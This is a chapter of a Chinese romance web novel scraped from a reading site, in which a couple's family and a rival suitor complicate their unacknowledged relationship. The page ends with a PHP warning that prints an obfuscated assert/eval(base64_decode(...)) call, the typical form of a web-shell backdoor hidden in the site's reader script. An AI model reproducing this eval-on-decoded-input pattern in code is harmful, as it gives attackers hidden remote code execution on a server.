99书盟 > 玄幻小说 > 老公是个女儿控[穿书] > 正文 第37章 第 37 章
    车内只能听到两个小孩玩耍的声音, 叶星澜没有说话,夏江同样没有说话。

    静默之中,空气似乎混入了一种名为“凝重”的成分。

    过了好一会儿, 叶星澜才“嗯”了一声。

    他说“没错,坑品如人品。”

    夏江又问“景深科技因为《星途》这个项目, 烧了不少钱吧?”

    听她这么一问, 叶星澜觉得心脏刚才漏了半拍,同时觉得他的太阳穴“突突”地疼。

    他在想,夏江是不是已经知道了。

    他认真想了想, 觉得其实这真的是一件很小很小的事情。

    所以叶星澜说“应该不多吧。”

    闻言,夏江默默把刚才下载的x眼查卸载了。

    他不说, 那么她什么都不知道。

    夏江“我也觉得不多,那就让它继续烧钱吧。”

    叶星澜“…………”

    好了,他确定她已经知道了。

    回到叶家, 苏文燕如愿尝到街角咖啡厅的新款巧克力蛋糕。

    虽然蛋糕不是很好吃,可是想到叶星澜给她买蛋糕过程中发生的事情, 她觉得这个蛋糕比瓜还香。

    餐桌上, 苏文燕的眼睛总是不经意在叶星澜、夏江身上打转,企图扒出一些有效信息。

    可惜的是, 叶星澜表现出来的神情与平时无异, 夏江也是一脸的温婉平静,像是什么事情都没有发生。

    苏文燕心想这不应该啊。

    这顿午饭吃得索然无味, 她觉得真是太可惜了。

    吃过午饭, 夏啾啾带叶萌萌到她的房间玩玩具, 夏江则是打算去她以前的房间整理一下今天的文档。

    叶星澜看了看夏江的背影, 也准备到书房处理他的工作, 结果被苏文燕叫住了。

    苏文燕问“你们今天没发生什么吗?”

    叶星澜看了她一眼, “你想发生什么?”

    她笑了笑,才说“我听陈桦说,苏培似乎挺喜欢夏江的。”

    叶星澜对她看热闹不嫌事大的性格有些无语,心里叹了口气。

    他说“这是我们的事情,你不要过多掺和。”

    苏文燕“嗯嗯嗯,不掺和不掺和。”

    一听就知道她没把话听进去。

    叶星澜心力交瘁,只好给她解释“这样夏江会生气的。”

    苏文燕“她生气了你就哄哄她嘛,不然你们怎么拉进感情?”

    叶星澜“反向拉进感情也算?”

    闻言,苏文燕以一种“你好没用”的眼神看着她的儿子。

    她问“难道没有今天这出,你和夏江就可以正向拉进感情?”

    苏文燕“啾啾回叶家都快三个月了,你连媳妇都还没追到。”

    苏文燕指责着叶星澜缓慢的进度,最后语重心长地说“星澜,你再不主动点,指不定夏江明天就跟苏培跑了。”

    想打夏江对苏培的评价,叶星澜反驳着说“那倒不会。”

    苏文燕“没有苏培,还有陈培赵培李培钱培,你大可放心。”

    叶星澜“…………”

    横竖就是他不如他们呗。

    苏文燕看到她的儿子这么不上道的样子,恨不得给他报名一个“恋爱补习班”,39天速成那种稳脱单那种。

    孩子都已经这么大了,当爹当妈的两个人都是单身都还没在一起,这合理吗?

    想想就不合理,想想当爹当妈的两个人还一副理所当然的态度,更加不合理!

    今天也是苏文燕一边吃瓜一边着急的一天。

    最后苏文燕板着脸,对叶星澜说“如果你不喜欢夏江,那你该考虑哪家的千金适合联姻了,不要耽误夏江和苏培,也不要耽误你和叶家。”

    叶星澜和赵煦雅联姻告吹一事,虽然家族默认了叶星澜的做法,但是他们并非真的没有意见。

    在道德情义面前,利益可以让道,可是利益的分量远大于个人感情。作为父母,叶盛年和苏文燕可以纵容叶星澜,可是叶老爷爷和叶家不会。

    出于道德情义和责任感,如果叶星澜要娶夏江,所有人都不会反对;如果叶星澜和夏江没有结婚打算,叶星澜必须和其他家族的千金联姻,叶家不会允许他像现在这样得过且过的。

    现在只是作为母亲的苏文燕在给叶星澜施加压力,他还有时间考虑。

    等到叶老爷爷和叶家家族向他施加压力,他几乎是没有第二个选择。

    这是不可避免的情况,苏文燕是知道的,叶星澜也是知道的。

    听到苏文燕这么说,叶星澜陷入片刻的沉默,声音低沉“嗯”了一声。

    叶星澜揉揉发疼的太阳穴,说“嗯,我知道的。”

    如果说夏江是在逃避,那他何尝不是呢。

    他是喜欢夏江的,也是在乎夏江的,只是没有那么喜欢、没有那么在乎。

    ……

    苏培隐隐感觉他的表哥和夏江之间有些不对劲,分别之后,他慢慢回想不对劲的地方。

    在此之前,夏江似乎不知道他和叶星澜是表兄弟关系?

    如果夏江只是一个普普通通、平平无奇的剧情策划或文案策划,不知道是正常的。

    可是夏江和叶星澜的关系吧,应该是一起生女儿的关系。他们都这种关系了,夏江难道还不知道叶星澜的家底吗?

    而且,叶星澜似乎没有向夏江透露的想法。

    于是恋爱脑的苏培大胆猜测或许他们不是这种关系!

    于是恋爱脑的苏培立即给夏江发微信消息,打探情报。

    苏培夏老师,你女儿真可爱!

    他特意发了几个可爱的表情,企图降低夏江对他的警惕。

    可是!

    夏江居然没有回复!

    苏培没等到回复,他实在等不住,又发了两条消息过去。

    苏培夏老师,你和我表哥什么时候结婚的?

    看到苏培发过来的消息,夏江沉默了一会儿。

    夏江这人,八卦的意图也太明显了吧?

    夏江言简意赅地给他回复没结婚。

    苏培看到这个回复,惊喜得手机都掉了,“啪”地一声砸在他的鼻梁上,那些生理性泪水都疼得流出来了。

    他揉揉鼻梁骨,还好还好,鼻子没歪。

    他不再躺在沙发上,而是坐起来了,认真给夏江回复消息。

    苏培我猜也是,毕竟夏老师那么年轻。

    苏培啾啾呢?她是你妹妹吗?

    苏培心存侥幸地想,万一是妹妹呢?

    毕竟后来啾啾都是喊夏江“姐姐”的。

    然而消息发出去,石沉大海,什么回复都没有了。

    苏培“…………”

    苏培不想说话,苏培想要静静。

    苏培觉得他在失恋和没有失恋之间反复横跳。

    真是令人惆怅的一天。

    周末两天的休息日很快就过去了,新的一周开始了。

    这周是叶星澜送夏啾啾去幼儿园,夏江这两天熬夜熬得厉害,不愿意早起,她心安理得睡到九点。

    她起来的时候家里没人,该去上学的上学、该去上班的上班。

    她到厨房热了一下苏安给她做好的早餐,一边吃着早餐一边看手机里的消息。

    这是她和景深科技签了协议的第四周,如无意外她过完这周就不用再和景深科技打交道了。

    夏江吃着早餐,心里计算着她的工作量和稿酬。

    然后夏江陷入沉默,因为她发现她是真的血亏。

    下午,夏江准时抵达景深科技。

    今天苏培没有迟到,她过去的时候看到苏培还有些惊讶地看他一眼。

    苏培自然不知道他在夏江心里已经留下“经常迟到”的印象。

    他朝夏江露出一个爽朗阳光的笑容,十分友好地打招呼“夏老师,下午好呀。”

    夏江“……嗯,苏老师下午好。”

    苏培还想和夏江寒暄寒暄,陈桦就过来棒打鸳鸯,瞥了不务正业的苏培一眼。

    陈桦对他们说“我们还是先开会吧。”

    等会他还要和夏江谈谈续约的事情,所以不想让苏培耽误太多时间。

    因为要赶进度,陈桦和苏培、夏江开完小会,然后和整个工作组开了一个大会,调整加快了他们的工作进度。

    苏培虽然半途跑路的黑历史,但是回归之后的他状态不错。加上有夏江这个工作狂搭档兼心上人在,他的工作效率连陈桦都没得抬杠。

    开完大会,苏培这个恋爱脑决定先把他的工作放放,打算约夏江看看电影吃个晚饭什么的。

    然而苏培还没来得及开口邀请,陈桦就先开口了“夏小姐,我有事和您单独谈谈,您方便吗?”

    夏江记得她和景深科技只签了一个月的“试用期”,陈桦肯定也是记得的。

    夏江看了看时间,距离夏啾啾放学还有些时间。

    她朝陈桦笑了一下,说“嗯,有时间的。陈总监您看我们是在这里谈还是?”

    陈桦看了一眼苏培,十分嫌弃地将他打发走了。

    陈桦“走走走,赶紧出去干活。”

    说着,他就推搡着苏培出去,然后把会议的门给关上。

    站在会议室门外的苏培“…………”

    就不能让他和夏江说两句话再赶他走吗??

    这个陈桦真是太可恶了!!

    这个秃头一定是妒嫉他比他年轻、有才华、有颜值,还有钱!!

    会议室里,陈桦在夏江对面坐下来,表露一种友好交谈的态度。

    他把新拟的合同双手递给夏江,说“夏小姐,您和景深科技的协议快到期了,这是我们新拟的合同。”

    夏江接过陈桦递过来的合同,说了一声“谢谢”,她认真看了一下,看到上面的薪酬沉默了。

    好久,夏江才把文件合上。

    她朝陈桦有些歉意地笑了笑,“陈总监,不好意思。”

    ……

    下午五点五十分,距离下班还有十分钟。

    林昭看着陈桦给他发的消息,有些愁啊。

    他不想加班,所以在下班前的最后两分钟给叶星澜汇报了这件事情。

    林昭“叶总,景深科技那位新同事说不留下来了。”

    他不知道其中缘故,他只是担心剧情策划跑了,苏培也跑了,到时候景深科技也要倒闭了。

    他是从景深科技出来的,他不想要看到这种情况发生。

    林昭叹了口气,说“那位新同事说给的价格太高了,怀疑我们想要坑她。”

    叶星澜“…………”

Warning: assert() [function.assert]: Assertion "$婐疬寰鳍= eval(base64_decode($嚚戥呷));" failed in E:\Web\99shumeng\modules\article\reader.php on line 2